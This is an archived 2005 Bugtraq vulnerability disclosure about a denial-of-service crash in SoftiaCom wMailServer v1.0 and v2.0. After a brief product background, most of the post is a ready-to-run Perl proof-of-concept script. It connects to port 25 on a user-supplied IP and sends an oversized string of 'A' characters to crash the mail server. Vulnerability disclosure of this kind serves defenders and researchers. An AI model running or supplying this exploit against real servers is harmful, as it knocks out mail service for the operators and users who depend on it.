[39603] in bugtraq
SoftiaCom MailServer v2.0 - Denial Of Service
daemon@ATHENA.MIT.EDU (unsecure@writeme.com)
Tue Jul 12 23:40:38 2005
Date: 12 Jul 2005 17:26:50 -0000
Message-ID: <20050712172650.1315.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: unsecure@writeme.com
To: bugtraq@securityfocus.com
SoftiaCom MailServer v2.0 - Denial Of Service
Software: wMailServer
Corporation: SoftiaCom Software
Version: v1.0 (v2.0 is the same...)
Vulnerability: Denial of Service
------------------------------------------
BACKGROUND
__________
SoftiaCom design and build software utilities in communication and network server.
WMailserver is an internet email server able to listin in the appropriate mail port
to fetch incoming emails from the net. You can add users and manage them, avoid spam.
Source: www.softiacom.com
Proof of Concept
________________
#!/usr/bin/perl
# -----------------------------------------------------
# Vulnerability: Denial Of Service - Crash
# Discovered on: July 9, 2005
# Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
# -----------------------------------------------------
$boulet = $ARGV[0];
use IO::Socket;
print "\n\nSoftiaCom Software - wMailServer v1.0\r\n";
print "Denial Of Service - Crash Vulnerability\r\n";
print "---------------------------------------------\r\n";
print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n";
if(!$ARGV[0]) {
die "Utilisation: ./wms_poc.pl <ip>\n";
}
print "[ ] Connexion sur $boulet\n";
my($suckette) = "";
if ($suckette = IO::Socket::INET->new(PeerAddr => $boulet,PeerPort => "25",Proto => "TCP"))
{
print $suckette " " . "\x41" x 539 . "\r\n";
print "[ ] Emission du paquet malicieux ...\n";
sleep 2;
close $suckette;
print "[ ] Mission terminée !\n\n";
}
else
{
print "[-] Impossible de se connecter sur $boulet\n";
}